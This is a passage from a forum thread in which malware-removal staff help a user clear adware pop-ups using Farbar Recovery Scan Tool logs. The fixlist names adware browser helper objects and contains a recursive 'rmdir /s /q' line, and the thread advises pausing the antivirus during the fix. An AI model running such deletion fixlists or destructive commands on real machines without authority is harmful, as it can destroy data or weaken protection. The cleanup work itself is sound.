MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Mystery of Mortlake Mansion (x32 Version: 2.2.0.98 - WildTangent) Hidden
NEF Codec (HKLM-x32\...\{D6506521-0959-4FA3-875F-E2E28830B0D2}) (Version: 1.00.0000 - Nikon)
Nero BackItUp 10 (HKLM-x32\...\{68AB6930-5BFF-4FF6-923B-516A91984FE6}) (Version: 5.8.11000.8.100 - Nero AG)
Nero DiscSpeed 10 (HKLM-x32\...\{34490F4E-48D0-492E-8249-B48BECF0537C}) (Version: 6.2.10500.2.100 - Nero AG)
Nero Express 10 (HKLM-x32\...\{70550193-1C22-445C-8FA4-564E155DB1A7}) (Version: 10.6.10700.5.100 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{62BF4BD3-B1F6-4FA2-8388-CC0647ACBF86}) (Version: 10.5.10300 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{68AFA3A7-9265-4ABD-994A-ACA413E3715C}) (Version: 10.6.10300 - Nero AG)
Nero RescueAgent 10 (HKLM-x32\...\{E337E787-CF61-4B7B-B84F-509202A54023}) (Version: 3.6.10500.3.100 - Nero AG)
Nero StartSmart 10 (HKLM-x32\...\{F61D489E-6C44-49AC-AD02-7DA8ACA73A65}) (Version: 10.2.11600.14.100 - Nero AG)
Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.10900.31.0 - Nero AG)
NOOK for PC (HKLM-x32\...\BN_DesktopReader) (Version: 2.5.4.7070 - Barnesandnoble.com)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
Nuance PaperPort 12 (HKLM-x32\...\{6C0A559F-8583-4B5A-8B50-20BEE15D8E64}) (Version: 12.1.0000 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
OLYMPUS Raw Codec (HKLM\...\{0136EF84-8660-4FE0-A9E5-F052F6230085}) (Version: 1.3.0 - OLYMPUS IMAGING CORP.)
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 1.00.0001 - Nuance Communications, Inc.)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
Personal Ancestral File 5  Lessons (HKLM-x32\...\{62C71C1B-E0FB-11D4-9DB7-00B0D02AE94A}) (Version:  - )
Personal Ancestral File 5 (HKLM-x32\...\{D94A8E22-DF2B-4107-9E51-608A60A7671D}) (Version:  - )
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6045 - Realtek Semiconductor Corp.)
Reference Point Software Template for APA format, Word 2010 (HKLM-x32\...\Reference Point Software Template for APA format, Word 2010) (Version:  - Reference Point Software, LLC)
Reference Point Template ver: Word 2010, APA 6th Ed. (HKLM-x32\...\Reference Point Template ver: Word 2010, APA 6th Ed.) (Version:  - Reference Point Software, LLC)
RootsMagic 6.3.0.2 (HKLM-x32\...\{94433E0D-764C-4964-AD0B-EC46BCA7E68E}_is1) (Version: RootsMagic 6.3.0.2 - RootsMagic, Inc.)
Scansoft PDF Professional (x32 Version:  - ) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Spotify) (Version: 0.9.15.27.g87efe634 - Spotify AB)
The Print Shop 23.1 (HKLM-x32\...\{0C8C6F56-41FA-44F6-8107-DCFAA7EFD601}) (Version: 23.1.11 - Broderbund Software)
Torchlight (x32 Version: 2.2.0.97 - WildTangent) Hidden
TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)
TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Virtual Villagers 5 - New Believers (x32 Version: 2.2.0.97 - WildTangent) Hidden
VirusTotal Uploader 2.2 (HKLM-x32\...\VTUploader) (Version:  - )
Welcome Center (HKLM-x32\...\Gateway Welcome Center) (Version: 1.02.3503 - Gateway Incorporated)
WildTangent Games App (Gateway Games) (x32 Version: 4.0.5.14 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.97 - WildTangent) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2977827394-2594518940-965070511-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

29-12-2014 21:47:33 Windows Update
03-01-2015 06:23:04 Windows Update
07-01-2015 09:49:21 Windows Update
10-01-2015 14:16:34 Windows Update
13-01-2015 07:50:59 Windows Update
14-01-2015 22:39:23 Windows Update
14-01-2015 23:09:50 Configured MediaEspresso
20-01-2015 21:41:41 Windows Update
22-01-2015 19:59:43 zoek.exe restore point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {080569E1-7812-4D07-BD89-164319B63ADF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000Core => C:\Users\Bonnie\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {11A35764-0770-462F-856B-741BA62F537E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {224B946F-8456-4B76-B6A5-CC5D802F83D2} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\WSCStub.exe
Task: {3CA658F8-E3B3-4EB7-8889-0C7EE17102AB} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {3E4DBC7D-7F19-4D96-BC4B-4539E3201C58} - \Norton Internet Security\Norton Error Analyzer No Task File <==== ATTENTION
Task: {49D6DDAB-C1DA-4CAB-ABB0-B346C725F9F3} - System32\Tasks\{D210C445-0250-4759-AEB7-787BE3B1C577} => pcalua.exe -a D:\Setup\LaunchSetup.exe -d D:\Setup
Task: {5F41B5CA-1D7B-46DE-8112-260AD0CBCCF9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-14] (Adobe Systems Incorporated)
Task: {811FB071-70B5-4AA1-A228-2EEFA94CE325} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {81EC917C-266D-4D73-9506-EA361552C835} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {843A4CE9-82B3-42B0-B696-F1EE6456F48C} - System32\Tasks\Adobe ARM => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {8A65DC9B-EA75-4DE2-A67D-E83BBBB4F4AC} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2011-05-20] (CyberLink)
Task: {93ABE615-7CD5-4ABE-8AF6-5B7FC1E12E8A} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000UA => C:\Users\Bonnie\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {9F710099-5E65-4EDD-BDFF-E30C2A2FE32F} - System32\Tasks\NBAgent => C:\Program Files (x86)\Nero\Nero 10\Nero BackItUp\NBAgent.exe [2011-07-05] (Nero AG)
Task: {BEFC35EC-1BF3-43CA-B976-D6A8705252FC} - System32\Tasks\Adobe Reader Speed Launcher => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [2014-12-03] (Adobe Systems Incorporated)
Task: {D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D} - \Norton Internet Security\Norton Error Processor No Task File <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-01-01 13:21 - 2012-09-18 15:27 - 00192512 _____ () C:\Windows\System32\zlhp1020.dll
2014-01-02 20:18 - 2012-09-18 15:27 - 00065024 _____ () C:\Windows\system32\spool\PRTPROCS\x64\pphp1020.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-08-30 13:46 - 2014-04-08 08:13 - 00069120 _____ () C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
2011-08-10 20:58 - 2011-08-10 20:58 - 00627304 _____ () C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
2009-08-14 10:55 - 2009-08-14 10:55 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2011-10-06 17:53 - 2011-10-06 17:53 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2012-02-20 20:29 - 2012-02-20 20:29 - 00087912 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-02-20 20:28 - 2012-02-20 20:28 - 01242472 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-05-08 14:52 - 2013-05-08 14:52 - 01270464 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\kpcengine.2.3.dll
2013-06-17 12:35 - 2013-06-17 12:35 - 00478400 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\dblite.dll
2012-08-30 13:39 - 2014-04-08 08:08 - 00112128 _____ () C:\Program Files (x86)\Canon\ImageBrowser EX\MFMFileSystemWatcher.dll
2011-08-10 20:57 - 2011-08-10 20:57 - 00151656 _____ () C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyHook.dll
2014-02-23 08:01 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00750080 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2015-01-23 18:05 - 2015-01-23 18:05 - 00043008 _____ () c:\users\bonnie\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00047616 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\libEGL.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00863744 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\plugins\platforms\qwindows.dll
2014-10-21 17:22 - 2014-10-21 17:22 - 00200704 _____ () C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\plugins\imageformats\qjpeg.dll
2015-01-20 22:29 - 2015-01-20 22:29 - 03925104 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Admin (S-1-5-21-2977827394-2594518940-965070511-1008 - Administrator - Enabled) => C:\Users\Admin
Administrator (S-1-5-21-2977827394-2594518940-965070511-500 - Administrator - Disabled)
ASPNET (S-1-5-21-2977827394-2594518940-965070511-1004 - Limited - Enabled)
Bonnie (S-1-5-21-2977827394-2594518940-965070511-1000 - Limited - Enabled) => C:\Users\Bonnie
Guest (S-1-5-21-2977827394-2594518940-965070511-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2977827394-2594518940-965070511-1007 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/23/2015 06:06:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/22/2015 08:23:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (01/23/2015 06:05:01 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
BHDrvx64

Error: (01/22/2015 08:22:06 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
BHDrvx64

Error: (01/22/2015 08:20:41 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The WerSvc service was unable to log on as NT AUTHORITY\SYSTEM with the currently configured password due to the following error:
%%1352

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (01/22/2015 08:13:11 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/22/2015 08:13:11 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #10 on: January 23, 2015, 07:43:02 PM »
Checkup:
 Results of screen317's Security Check version 0.99.95 
 Windows 7 Service Pack 1 x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````[/u]
 Windows Security Center service is not running! This report may not be accurate!
 Windows Firewall Enabled! 
Kaspersky Internet Security   
 Antivirus up to date!   
`````````Anti-malware/Other Utilities Check:`````````[/u]
 VirusTotal Uploader 2.2   
  Java 64-bit 8 Update 31[/color] 
 Adobe Flash Player 16.0.0.257 
 Adobe Reader 10.1.13 Adobe Reader out of Date! 
 Mozilla Firefox (35.0)
````````Process Check: objlist.exe by Laurent````````[/u] 
 Symantec Norton Online Backup NOBuAgent.exe 
 Kaspersky Lab Kaspersky Internet Security 14.0.0 avp.exe 
 Kaspersky Lab Kaspersky Internet Security 14.0.0 avpui.exe 
 Kaspersky Lab Kaspersky Internet Security 14.0.0 x64 wmi64.exe
`````````````````System Health check`````````````````[/u]
 Total Fragmentation on Drive C: 1%
````````````````````End of Log``````````````````````[/u]

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #11 on: January 24, 2015, 04:20:57 AM »
Thanks for those logs, still work to do....

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Next,

Pause Kaspersky internet security, instructions at the following link: (also turn off internet connection whilst KIS is off)

http://support.kaspersky.com/us/11463#block0

Next,

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was ran from. Please post it to your reply.

Next,

Turn KIS back on, also re-connect to internet....

Adobe Reader is outdated...
Visit http://get.adobe.com/uk/reader/otherversions/ and download the latest version of Acrobat Reader

Step 1 - Select your Operating System.
Step 2 - Select your Langauge.
Step 3 - Select latest version.

Untick the option for any security scanner or toolbar if offered.

Download and install.

Having the latest updates ensures there are no security vulnerabilities in your system.

Next,

We need to uninstall Google Chrome (it is corrupt) first back up important Bookmarks. Instructions at following link:

http://www.wikihow.com/Export-Bookmarks-from-Chrome (also includes how to import saved bookmarks)

Next,

Uninstall Chrome, instructions here: https://support.google.com/chrome/answer/95319?hl=en-GB

Next,

Re-install Chrome: https://www.google.com/intl/en_uk/chrome/browser/desktop/index.html

Install AdBlockPlus https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb

Post log from FRST (fixlog.txt) also let me know if any remaining issues or concerns...

Thank you,

Kevin...

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #12 on: January 24, 2015, 09:12:17 AM »
Ok, I ran the fix and updated Adobe Reader.  The funny thing is that I uninstalled Google Chrome before I made my first post here at SpywareHammer.  I just checked again, and there is no Google Chrome in the Programs and Features for me to uninstall.

I uninstalled Chrome before because I noticed that the tOPDeals extension kept re-installing itself.

Here is the log you requested.
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 19-01-2015
Ran by Admin at 2015-01-24 07:51:02 Run:2
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
ShortcutTarget: Dropbox.lnk -> C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll No File
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll No File
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
S1 BHDrvx64; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\BASHDefs\20120711.002\BHDrvx64.sys [X]
S3 NAVENG; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\ENG64.SYS [X]
S3 NAVEX15; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\EX64.SYS [X]
C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll
Task: {3E4DBC7D-7F19-4D96-BC4B-4539E3201C58} - \Norton Internet Security\Norton Error Analyzer No Task File <==== ATTENTION
Task: {D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D} - \Norton Internet Security\Norton Error Processor No Task File <==== ATTENTION
Emptytemp:
end



*****************

HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir => value deleted successfully.
C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt1" => Key deleted successfully.
HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt2" => Key deleted successfully.
HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt3" => Key deleted successfully.
HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt4" => Key deleted successfully.
HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt1" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt2" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt3" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{01050D05-D546-B8DC-954D-8334A8A7BF5A}" => Key deleted successfully.
"HKCR\CLSID\{01050D05-D546-B8DC-954D-8334A8A7BF5A}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2F344960-763E-9E6C-E973-25241A34D54E}" => Key deleted successfully.
"HKCR\CLSID\{2F344960-763E-9E6C-E973-25241A34D54E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}" => Key deleted successfully.
"HKCR\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-bf9c473dd360}" => Key deleted successfully.
"HKCR\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4552D3D-6B41-9AF1-3067-72A066972344}" => Key deleted successfully.
"HKCR\CLSID\{B4552D3D-6B41-9AF1-3067-72A066972344}" => Key deleted successfully.
BHDrvx64 => Service deleted successfully.
NAVENG => Service deleted successfully.
NAVEX15 => Service deleted successfully.
"C:\Users\Bonnie\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpr4zdmj.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3E4DBC7D-7F19-4D96-BC4B-4539E3201C58}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3E4DBC7D-7F19-4D96-BC4B-4539E3201C58}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error Analyzer" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D8E2FD8D-CCA1-48A5-AADF-3AA2FC346D7D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Internet Security\Norton Error Processor" => Key deleted successfully.
EmptyTemp: => Removed 19.8 MB temporary data.


The system needed a reboot.

==== End of Fixlog 07:51:03 ====

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #13 on: January 24, 2015, 03:37:37 PM »
One last task before we clean up:

Please download SystemLook from the following link below and save it to your Desktop. Use the correct version 32bit or 64bit.

http://jpshortstuff.247fixes.com/SystemLook_x64.exe     <<-   64 bit….

http://images.malwareremoval.com/jpshortstuff/SystemLook.exe  <<-  32 bit

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:

Code: [Select]
:regfind
Chrome
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #14 on: January 26, 2015, 10:13:09 PM »
Here are the results of the SystemLook scan:

SystemLook 30.07.11 by jpshortstuff
Log created at 21:11 on 26/01/2015 by Admin
Administrator - Elevation successful

